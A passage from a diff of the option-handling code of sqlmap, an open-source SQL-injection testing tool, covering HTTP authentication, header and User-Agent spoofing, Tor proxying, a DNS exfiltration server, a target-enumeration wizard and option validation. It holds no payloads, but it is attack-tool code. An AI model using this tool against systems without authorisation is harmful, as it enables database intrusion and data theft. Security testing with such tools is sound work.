2, 3] - boundary.prefix = conf.prefix - boundary.suffix = conf.suffix - - if " like" in boundary.suffix.lower(): - if "'" in boundary.suffix.lower(): - boundary.ptype = 3 - elif '"' in boundary.suffix.lower(): - boundary.ptype = 5 - elif "'" in boundary.suffix: - boundary.ptype = 2 - elif '"' in boundary.suffix: - boundary.ptype = 4 - else: - boundary.ptype = 1 - - # user who provides --prefix/--suffix does not want other boundaries - # to be tested for - conf.boundaries = [boundary] - -def _setAuthCred(): - """ - Adds authentication credentials (if any) for current target to the password manager - (used by connection handler) - """ - - if kb.passwordMgr and all(_ is not None for _ in (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)): - kb.passwordMgr.add_password(None, "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port), conf.authUsername, conf.authPassword) - -def _setHTTPAuthentication(): - """ - Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or PKI), - username and password for first three methods, or PEM private key file for - PKI authentication - """ - - global authHandler - - if not conf.authType and not conf.authCred and not conf.authFile: - return - - if conf.authFile and not conf.authType: - conf.authType = AUTH_TYPE.PKI - - elif conf.authType and not conf.authCred and not conf.authFile: - errMsg = "you specified the HTTP authentication type, but " - errMsg += "did not provide the credentials" - raise SqlmapSyntaxException(errMsg) - - elif not conf.authType and conf.authCred: - errMsg = "you specified the HTTP authentication credentials, " - errMsg += "but did not provide the type" - raise SqlmapSyntaxException(errMsg) - - elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI): - errMsg = "HTTP authentication type value must be " - errMsg += "Basic, Digest, NTLM or PKI" - raise SqlmapSyntaxException(errMsg) - - if not conf.authFile: - debugMsg = "setting the HTTP authentication type and credentials" - logger.debug(debugMsg) - - aTypeLower = conf.authType.lower() - - if aTypeLower in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST): - regExp = "^(.*?):(.*?)$" - errMsg = "HTTP %s authentication credentials " % aTypeLower - errMsg += "value must be in format 'username:password'" - elif aTypeLower == AUTH_TYPE.NTLM: - regExp = "^(.*\\\\.*):(.*?)$" - errMsg = "HTTP NTLM authentication credentials value must " - errMsg += "be in format 'DOMAIN\username:password'" - elif aTypeLower == AUTH_TYPE.PKI: - errMsg = "HTTP PKI authentication require " - errMsg += "usage of option `--auth-pki`" - raise SqlmapSyntaxException(errMsg) - - aCredRegExp = re.search(regExp, conf.authCred) - - if not aCredRegExp: - raise SqlmapSyntaxException(errMsg) - - conf.authUsername = aCredRegExp.group(1) - conf.authPassword = aCredRegExp.group(2) - - kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm() - - _setAuthCred() - - if aTypeLower == AUTH_TYPE.BASIC: - authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr) - - elif aTypeLower == AUTH_TYPE.DIGEST: - authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr) - - elif aTypeLower == AUTH_TYPE.NTLM: - try: - from ntlm import HTTPNtlmAuthHandler - except ImportError: - errMsg = "sqlmap requires Python NTLM third-party library " - errMsg += "in order to authenticate via NTLM, " - errMsg += "http://code.google.com/p/python-ntlm/" - raise SqlmapMissingDependence(errMsg) - - authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr) - else: - debugMsg = "setting the HTTP(s) authentication PEM private key" - logger.debug(debugMsg) - - _ = safeExpandUser(conf.authFile) - checkFile(_) - authHandler = HTTPSPKIAuthHandler(_) - -def _setHTTPExtraHeaders(): - if conf.headers: - debugMsg = "setting extra HTTP headers" - logger.debug(debugMsg) - - conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n") - - for headerValue in conf.headers: - if not headerValue.strip(): - continue - - if headerValue.count(':') >= 1: - header, value = (_.lstrip() for _ in headerValue.split(":", 1)) - - if header and value: - conf.httpHeaders.append((header, value)) - else: - errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u') - raise SqlmapSyntaxException(errMsg) - - elif not conf.requestFile and len(conf.httpHeaders or []) < 2: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5")) - if not conf.charset: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7")) - else: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset)) - - # Invalidating any caching mechanism in between - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html - conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache,no-store")) - conf.httpHeaders.append((HTTP_HEADER.PRAGMA, "no-cache")) - -def _defaultHTTPUserAgent(): - """ - @return: default sqlmap HTTP User-Agent header - @rtype: C{str} - """ - - return "%s (%s)" % (VERSION_STRING, SITE) - - # Firefox 3 running on Ubuntu 9.04 updated at April 2009 - #return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9" - - # Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english - # updated at March 2009 - #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" - -def _setHTTPUserAgent(): - """ - Set the HTTP User-Agent header. - Depending on the user options it can be: - - * The default sqlmap string - * A default value read as user option - * A random value read from a list of User-Agent headers from a - file choosed as user option - """ - - if conf.mobile: - message = "which smartphone do you want sqlmap to imitate " - message += "through HTTP User-Agent header?\n" - items = sorted(getPublicTypeMembers(MOBILES, True)) - - for count in xrange(len(items)): - item = items[count] - message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "") - - test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1) - - try: - item = items[int(test) - 1] - except: - item = MOBILES.IPHONE - - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1])) - - elif conf.agent: - debugMsg = "setting the HTTP User-Agent header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent)) - - elif not conf.randomAgent: - _ = True - - for header, _ in conf.httpHeaders: - if header == HTTP_HEADER.USER_AGENT: - _ = False - break - - if _: - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent())) - - else: - if not kb.userAgents: - debugMsg = "loading random HTTP User-Agent header(s) from " - debugMsg += "file '%s'" % paths.USER_AGENTS - logger.debug(debugMsg) - - try: - kb.userAgents = getFileItems(paths.USER_AGENTS) - except IOError: - warnMsg = "unable to read HTTP User-Agent header " - warnMsg += "file '%s'" % paths.USER_AGENTS - logger.warn(warnMsg) - - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent())) - return - - userAgent = random.sample(kb.userAgents or [_defaultHTTPUserAgent()], 1)[0] - - infoMsg = "fetched random HTTP User-Agent header from " - infoMsg += "file '%s': '%s'" % (paths.USER_AGENTS, userAgent) - logger.info(infoMsg) - - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent)) - -def _setHTTPReferer(): - """ - Set the HTTP Referer - """ - - if conf.referer: - debugMsg = "setting the HTTP Referer header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer)) - -def _setHTTPHost(): - """ - Set the HTTP Host - """ - - if conf.host: - debugMsg = "setting the HTTP Host header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host)) - -def _setHTTPCookies(): - """ - Set the HTTP Cookie header - """ - - if conf.cookie: - debugMsg = "setting the HTTP Cookie header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie)) - -def _setHTTPTimeout(): - """ - Set the HTTP timeout - """ - - if conf.timeout: - debugMsg = "setting the HTTP timeout" - logger.debug(debugMsg) - - conf.timeout = float(conf.timeout) - - if conf.timeout < 3.0: - warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " - warnMsg += "will going to reset it" - logger.warn(warnMsg) - - conf.timeout = 3.0 - else: - conf.timeout = 30.0 - - socket.setdefaulttimeout(conf.timeout) - -def _checkDependencies(): - """ - Checks for missing dependencies. - """ - - if conf.dependencies: - checkDependencies() - -def _createTemporaryDirectory(): - """ - Creates temporary directory for this run. - """ - - try: - if not os.path.isdir(tempfile.gettempdir()): - os.makedirs(tempfile.gettempdir()) - except IOError, ex: - errMsg = "there has been a problem while accessing " - errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) - errMsg += "make sure that there is enough disk space left. If problem persists, " - errMsg += "try to set environment variable 'TEMP' to a location " - errMsg += "writeable by the current user" - raise SqlmapSystemException, errMsg - - if "sqlmap" not in (tempfile.tempdir or ""): - tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) - - kb.tempDir = tempfile.tempdir - - if not os.path.isdir(tempfile.tempdir): - os.makedirs(tempfile.tempdir) - -def _cleanupOptions(): - """ - Cleanup configuration attributes. - """ - - debugMsg = "cleaning up configuration parameters" - logger.debug(debugMsg) - - width = getConsoleWidth() - - if conf.eta: - conf.progressWidth = width - 26 - else: - conf.progressWidth = width - 46 - - for key, value in conf.items(): - if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")): - conf[key] = safeExpandUser(value) - - if conf.testParameter: - conf.testParameter = urldecode(conf.testParameter) - conf.testParameter = conf.testParameter.replace(" ", "") - conf.testParameter = re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter) - else: - conf.testParameter = [] - - if conf.user: - conf.user = conf.user.replace(" ", "") - - if conf.rParam: - conf.rParam = conf.rParam.replace(" ", "") - conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam) - else: - conf.rParam = [] - - if conf.paramDel and '\\' in conf.paramDel: - conf.paramDel = conf.paramDel.decode("string_escape") - - if conf.skip: - conf.skip = conf.skip.replace(" ", "") - conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip) - else: - conf.skip = [] - - if conf.cookie: - conf.cookie = re.sub(r"[\r\n]", "", conf.cookie) - - if conf.delay: - conf.delay = float(conf.delay) - - if conf.rFile: - conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile)) - - if conf.wFile: - conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile)) - - if conf.dFile: - conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile)) - - if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"): - conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl) - - if conf.msfPath: - conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath)) - - if conf.tmpPath: - conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath)) - - if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.forms, conf.crawlDepth)): - conf.multipleTargets = True - - if conf.optimize: - setOptimize() - - if conf.data: - conf.data = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data, re.I) - - if conf.url: - conf.url = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url, re.I) - - if conf.os: - conf.os = conf.os.capitalize() - - if conf.dbms: - conf.dbms = conf.dbms.capitalize() - - if conf.testFilter: - conf.testFilter = conf.testFilter.strip('*+') - conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter) - - if conf.testSkip: - conf.testSkip = conf.testSkip.strip('*+') - conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip) - - if "timeSec" not in kb.explicitSettings: - if conf.tor: - conf.timeSec = 2 * conf.timeSec - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE - - warnMsg = "increasing default value for " - warnMsg += "option '--time-sec' to %d because " % conf.timeSec - warnMsg += "switch '--tor' was provided" - logger.warn(warnMsg) - else: - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE - - if conf.retries: - conf.retries = min(conf.retries, MAX_CONNECT_RETRIES) - - if conf.code: - conf.code = int(conf.code) - - if conf.csvDel: - conf.csvDel = conf.csvDel.decode("string_escape") # e.g. '\\t' -> '\t' - - if conf.torPort and isinstance(conf.torPort, basestring) and conf.torPort.isdigit(): - conf.torPort = int(conf.torPort) - - if conf.torType: - conf.torType = conf.torType.upper() - - if conf.outputDir: - paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir)) - setPaths() - - if conf.string: - try: - conf.string = conf.string.decode("unicode_escape") - except: - charset = string.whitespace.replace(" ", "") - for _ in charset: - conf.string = conf.string.replace(_.encode("string_escape"), _) - - if conf.getAll: - map(lambda x: conf.__setitem__(x, True), WIZARD.ALL) - - if conf.noCast: - for _ in DUMP_REPLACEMENTS.keys(): - del DUMP_REPLACEMENTS[_] - - if conf.dumpFormat: - conf.dumpFormat = conf.dumpFormat.upper() - - if conf.torType: - conf.torType = conf.torType.upper() - - if conf.col: - conf.col = re.sub(r"\s*,\s*", ",", conf.col) - - if conf.excludeCol: - conf.excludeCol = re.sub(r"\s*,\s*", ",", conf.excludeCol) - - if conf.binaryFields: - conf.binaryFields = re.sub(r"\s*,\s*", ",", conf.binaryFields) - - threadData = getCurrentThreadData() - threadData.reset() - -def _dirtyPatches(): - """ - Place for "dirty" Python related patches - """ - - httplib._MAXLINE = 1 * 1024 * 1024 # to accept overly long result lines (e.g. SQLi results in HTTP header responses) - -def _purgeOutput(): - """ - Safely removes (purges) output directory. - """ - - if conf.purgeOutput: - purge(paths.SQLMAP_OUTPUT_PATH) - -def _setConfAttributes(): - """ - This function set some needed attributes into the configuration - singleton. - """ - - debugMsg = "initializing the configuration" - logger.debug(debugMsg) - - conf.authUsername = None - conf.authPassword = None - conf.boundaries = [] - conf.cj = None - conf.dbmsConnector = None - conf.dbmsHandler = None - conf.dnsServer = None - conf.dumpPath = None - conf.hashDB = None - conf.hashDBFile = None - conf.httpHeaders = [] - conf.hostname = None - conf.ipv6 = False - conf.multipleTargets = False - conf.outputPath = None - conf.paramDict = {} - conf.parameters = {} - conf.path = None - conf.port = None - conf.proxyList = None - conf.resultsFilename = None - conf.resultsFP = None - conf.scheme = None - conf.tests = [] - conf.trafficFP = None - conf.wFileType = None - -def _setKnowledgeBaseAttributes(flushAll=True): - """ - This function set some needed attributes into the knowledge base - singleton. - """ - - debugMsg = "initializing the knowledge base" - logger.debug(debugMsg) - - kb.absFilePaths = set() - kb.adjustTimeDelay = None - kb.alerted = False - kb.alwaysRefresh = None - kb.arch = None - kb.authHeader = None - kb.bannerFp = AttribDict() - kb.binaryField = False - - kb.brute = AttribDict({"tables": [], "columns": []}) - kb.bruteMode = False - - kb.cache = AttribDict() - kb.cache.content = {} - kb.cache.regex = {} - kb.cache.stdev = {} - - kb.chars = AttribDict() - kb.chars.delimiter = randomStr(length=6, lowercase=True) - kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) - kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) - kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True)) - - kb.columnExistsChoice = None - kb.commonOutputs = None - kb.counters = {} - kb.data = AttribDict() - kb.dataOutputFlag = False - - # Active back-end DBMS fingerprint - kb.dbms = None - kb.dbmsVersion = [UNKNOWN_DBMS_VERSION] - - kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] - kb.dep = None - kb.dnsMode = False - kb.dnsTest = None - kb.docRoot = None - kb.dumpTable = None - kb.dynamicMarkings = [] - kb.dynamicParameter = False - kb.endDetection = False - kb.explicitSettings = set() - kb.extendTests = None - kb.errorChunkLength = None - kb.errorIsNone = True - kb.fileReadMode = False - kb.followSitemapRecursion = None - kb.forcedDbms = None - kb.forcePartialUnion = False - kb.forceWhere = None - kb.futileUnion = None - kb.headersFp = {} - kb.heuristicDbms = None - kb.heuristicMode = False - kb.heuristicTest = None - kb.hintValue = None - kb.htmlFp = [] - kb.httpErrorCodes = {} - kb.inferenceMode = False - kb.ignoreCasted = None - kb.ignoreNotFound = False - kb.ignoreTimeout = False - kb.injection = InjectionDict() - kb.injections = [] - kb.laggingChecked = False - kb.lastParserStatus = None - - kb.locks = AttribDict() - for _ in ("cache", "count", "index", "io", "limit", "log", "socket", "redirect", "request", "value"): - kb.locks[_] = threading.Lock() - - kb.matchRatio = None - kb.maxConnectionsFlag = False - kb.mergeCookies = None - kb.multiThreadMode = False - kb.negativeLogic = False - kb.nullConnection = None - kb.oldMsf = None - kb.orderByColumns = None - kb.originalCode = None - kb.originalPage = None - kb.originalPageTime = None - kb.originalTimeDelay = None - kb.originalUrls = dict() - - # Back-end DBMS underlying operating system fingerprint via banner (-b) - # parsing - kb.os = None - kb.osVersion = None - kb.osSP = None - - kb.pageCompress = True - kb.pageTemplate = None - kb.pageTemplates = dict() - kb.pageEncoding = DEFAULT_PAGE_ENCODING - kb.pageStable = None - kb.partRun = None - kb.permissionFlag = False - kb.postHint = None - kb.postSpaceToPlus = False - kb.postUrlEncode = True - kb.prependFlag = False - kb.processResponseCounter = 0 - kb.previousMethod = None - kb.processUserMarks = None - kb.proxyAuthHeader = None - kb.queryCounter = 0 - kb.redirectChoice = None - kb.reflectiveMechanism = True - kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0} - kb.requestCounter = 0 - kb.resendPostOnRedirect = None - kb.responseTimes = {} - kb.responseTimeMode = None - kb.responseTimePayload = None - kb.resumeValues = True - kb.safeCharEncode = False - kb.safeReq = AttribDict() - kb.singleLogFlags = set() - kb.reduceTests = None - kb.tlsSNI = {} - kb.stickyDBMS = False - kb.stickyLevel = None - kb.storeCrawlingChoice = None - kb.storeHashesChoice = None - kb.suppressResumeInfo = False - kb.technique = None - kb.tempDir = None - kb.testMode = False - kb.testOnlyCustom = False - kb.testQueryCount = 0 - kb.testType = None - kb.threadContinue = True - kb.threadException = False - kb.tableExistsChoice = None - kb.timeValidCharsRun = 0 - kb.uChar = NULL - kb.unionDuplicates = False - kb.xpCmdshellAvailable = False - - if flushAll: - kb.headerPaths = {} - kb.keywords = set(getFileItems(paths.SQL_KEYWORDS)) - kb.passwordMgr = None - kb.skipVulnHost = None - kb.tamperFunctions = [] - kb.targets = oset() - kb.testedParams = set() - kb.userAgents = None - kb.vainRun = True - kb.vulnHosts = set() - kb.wafFunctions = [] - kb.wordlists = None - -def _useWizardInterface(): - """ - Presents simple wizard interface for beginner users - """ - - if not conf.wizard: - return - - logger.info("starting wizard interface") - - while not conf.url: - message = "Please enter full target URL (-u): " - conf.url = readInput(message, default=None) - - message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST) - conf.data = readInput(message, default=None) - - if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url): - warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST) - warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). " - if not conf.crawlDepth and not conf.forms: - warnMsg += "Will search for forms" - conf.forms = True - logger.warn(warnMsg) - - choice = None - - while choice is None or choice not in ("", "1", "2", "3"): - message = "Injection difficulty (--level/--risk). Please choose:\n" - message += "[1] Normal (default)\n[2] Medium\n[3] Hard" - choice = readInput(message, default='1') - - if choice == '2': - conf.risk = 2 - conf.level = 3 - elif choice == '3': - conf.risk = 3 - conf.level = 5 - else: - conf.risk = 1 - conf.level = 1 - - if not conf.getAll: - choice = None - - while choice is None or choice not in ("", "1", "2", "3"): - message = "Enumeration (--banner/--current-user/etc). Please choose:\n" - message += "[1] Basic (default)\n[2] Intermediate\n[3] All" - choice = readInput(message, default='1') - - if choice == '2': - map(lambda x: conf.__setitem__(x, True), WIZARD.INTERMEDIATE) - elif choice == '3': - map(lambda x: conf.__setitem__(x, True), WIZARD.ALL) - else: - map(lambda x: conf.__setitem__(x, True), WIZARD.BASIC) - - logger.debug("muting sqlmap.. it will do the magic for you") - conf.verbose = 0 - - conf.batch = True - conf.threads = 4 - - dataToStdout("\nsqlmap is running, please wait..\n\n") - -def _saveConfig(): - """ - Saves the command line options to a sqlmap configuration INI file - Format. - """ - - if not conf.saveConfig: - return - - debugMsg = "saving command line options to a sqlmap configuration INI file" - logger.debug(debugMsg) - - config = UnicodeRawConfigParser() - userOpts = {} - - for family in optDict.keys(): - userOpts[family] = [] - - for option, value in conf.items(): - for family, optionData in optDict.items(): - if option in optionData: - userOpts[family].append((option, value, optionData[option])) - - for family, optionData in userOpts.items(): - config.add_section(family) - - optionData.sort() - - for option, value, datatype in optionData: - if datatype and isListLike(datatype): - datatype = datatype[0] - - if option in IGNORE_SAVE_OPTIONS: - continue - - if value is None: - if datatype == OPTION_TYPE.BOOLEAN: - value = "False" - elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT): - if option in defaults: - value = str(defaults[option]) - else: - value = "0" - elif datatype == OPTION_TYPE.STRING: - value = "" - - if isinstance(value, basestring): - value = value.replace("\n", "\n ") - - config.set(family, option, value) - - confFP = openFile(conf.saveConfig, "wb") - - try: - config.write(confFP) - except IOError, ex: - errMsg = "something went wrong while trying " - errMsg += "to write to the configuration file '%s' ('%s')" % (conf.saveConfig, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig - logger.info(infoMsg) - -def setVerbosity(): - """ - This function set the verbosity of sqlmap output messages. - """ - - if conf.verbose is None: - conf.verbose = 1 - - conf.verbose = int(conf.verbose) - - if conf.verbose == 0: - logger.setLevel(logging.ERROR) - elif conf.verbose == 1: - logger.setLevel(logging.INFO) - elif conf.verbose > 2 and conf.eta: - conf.verbose = 2 - logger.setLevel(logging.DEBUG) - elif conf.verbose == 2: - logger.setLevel(logging.DEBUG) - elif conf.verbose == 3: - logger.setLevel(CUSTOM_LOGGING.PAYLOAD) - elif conf.verbose == 4: - logger.setLevel(CUSTOM_LOGGING.TRAFFIC_OUT) - elif conf.verbose >= 5: - logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN) - -def _normalizeOptions(inputOptions): - """ - Sets proper option types - """ - - types_ = {} - for group in optDict.keys(): - types_.update(optDict[group]) - - for key in inputOptions: - if key in types_: - value = inputOptions[key] - if value is None: - continue - - type_ = types_[key] - if type_ and isinstance(type_, tuple): - type_ = type_[0] - - if type_ == OPTION_TYPE.BOOLEAN: - try: - value = bool(value) - except (TypeError, ValueError): - value = False - elif type_ == OPTION_TYPE.INTEGER: - try: - value = int(value) - except (TypeError, ValueError): - value = 0 - elif type_ == OPTION_TYPE.FLOAT: - try: - value = float(value) - except (TypeError, ValueError): - value = 0.0 - - inputOptions[key] = value - -def _mergeOptions(inputOptions, overrideOptions): - """ - Merge command line options with configuration file and default options. - - @param inputOptions: optparse object with command line options. - @type inputOptions: C{instance} - """ - - if inputOptions.pickledOptions: - try: - inputOptions = base64unpickle(inputOptions.pickledOptions) - _normalizeOptions(inputOptions) - except Exception, ex: - errMsg = "provided invalid value '%s' for option '--pickled-options'" % inputOptions.pickledOptions - errMsg += " ('%s')" % ex if ex.message else "" - raise SqlmapSyntaxException(errMsg) - - if inputOptions.configFile: - configFileParser(inputOptions.configFile) - - if hasattr(inputOptions, "items"): - inputOptionsItems = inputOptions.items() - else: - inputOptionsItems = inputOptions.__dict__.items() - - for key, value in inputOptionsItems: - if key not in conf or value not in (None, False) or overrideOptions: - conf[key] = value - - for key, value in conf.items(): - if value is not None: - kb.explicitSettings.add(key) - - for key, value in defaults.items(): - if hasattr(conf, key) and conf[key] is None: - conf[key] = value - - lut = {} - for group in optDict.keys(): - lut.update((_.upper(), _) for _ in optDict[group]) - - envOptions = {} - for key, value in os.environ.items(): - if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX): - _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper() - if _ in lut: - envOptions[lut[_]] = value - - if envOptions: - _normalizeOptions(envOptions) - for key, value in envOptions.items(): - conf[key] = value - - mergedOptions.update(conf) - -def _setTrafficOutputFP(): - if conf.trafficFile: - infoMsg = "setting file for logging HTTP traffic" - logger.info(infoMsg) - - conf.trafficFP = openFile(conf.trafficFile, "w+") - -def _setDNSServer(): - if not conf.dnsName: - return - - infoMsg = "setting up DNS server instance" - logger.info(infoMsg) - - isAdmin = runningAsAdmin() - - if isAdmin: - try: - conf.dnsServer = DNSServer() - conf.dnsServer.run() - except socket.error, msg: - errMsg = "there was an error while setting up " - errMsg += "DNS server instance ('%s')" % msg - raise SqlmapGenericException(errMsg) - else: - errMsg = "you need to run sqlmap as an administrator " - errMsg += "if you want to perform a DNS data exfiltration attack " - errMsg += "as it will need to listen on privileged UDP port 53 " - errMsg += "for incoming address resolution attempts" - raise SqlmapMissingPrivileges(errMsg) - -def _setProxyList(): - if not conf.proxyFile: - return - - conf.proxyList = [] - for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w.]+):(\d+)", readCachedFileContent(conf.proxyFile)): - _, type_, address, port = match.groups() - conf.proxyList.append("%s://%s:%s" % (type_ or "http", address, port)) - -def _setTorProxySettings(): - if not conf.tor: - return - - if conf.torType == PROXY_TYPE.HTTP: - _setTorHttpProxySettings() - else: - _setTorSocksProxySettings() - -def _setTorHttpProxySettings(): - infoMsg = "setting Tor HTTP proxy settings" - logger.info(infoMsg) - - found = None - - for port in (DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((LOCALHOST, port)) - found = port - break - except socket.error: - pass - - s.close() - - if found: - conf.proxy = "http://%s:%d" % (LOCALHOST, found) - else: - errMsg = "can't establish connection with the Tor proxy. " - errMsg += "Please make sure that you have Vidalia, Privoxy or " - errMsg += "Polipo bundle installed for you to be able to " - errMsg += "successfully use switch '--tor' " - - raise SqlmapConnectionException(errMsg) - - if not conf.checkTor: - warnMsg = "use switch '--check-tor' at " - warnMsg += "your own convenience when accessing " - warnMsg += "Tor anonymizing network because of " - warnMsg += "known issues with default settings of various 'bundles' " - warnMsg += "(e.g. Vidalia)" - logger.warn(warnMsg) - -def _setTorSocksProxySettings(): - infoMsg = "setting Tor SOCKS proxy settings" - logger.info(infoMsg) - - # Has to be SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT) - socks.wrapmodule(urllib2) - -def _checkWebSocket(): - if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")): - try: - from websocket import ABNF - except ImportError: - errMsg = "sqlmap requires third-party module 'websocket-client' " - errMsg += "in order to use WebSocket funcionality" - raise SqlmapMissingDependence(errMsg) - -def _checkTor(): - if not conf.checkTor: - return - - infoMsg = "checking Tor connection" - logger.info(infoMsg) - - try: - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) - except SqlmapConnectionException: - page = None - - if not page or 'Congratulations' not in page: - errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" - raise SqlmapConnectionException(errMsg) - else: - infoMsg = "Tor is properly being used" - logger.info(infoMsg) - -def _basicOptionValidation(): - if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0): - errMsg = "value for option '--start' (limitStart) must be an integer value greater than zero (>0)" - raise SqlmapSyntaxException(errMsg) - - if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0): - errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)" - raise SqlmapSyntaxException(errMsg) - - if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5): - errMsg = "value for option '--level' must be an integer value from range [1, 5]" - raise SqlmapSyntaxException(errMsg) - - if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3): - errMsg = "value for option '--risk' must be an integer value from range [1, 3]" - raise SqlmapSyntaxException(errMsg) - - if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ - isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: - errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option" - raise SqlmapSyntaxException(errMsg) - - if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ - isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: - errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option" - raise SqlmapSyntaxException(errMsg) - - if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0): - errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be 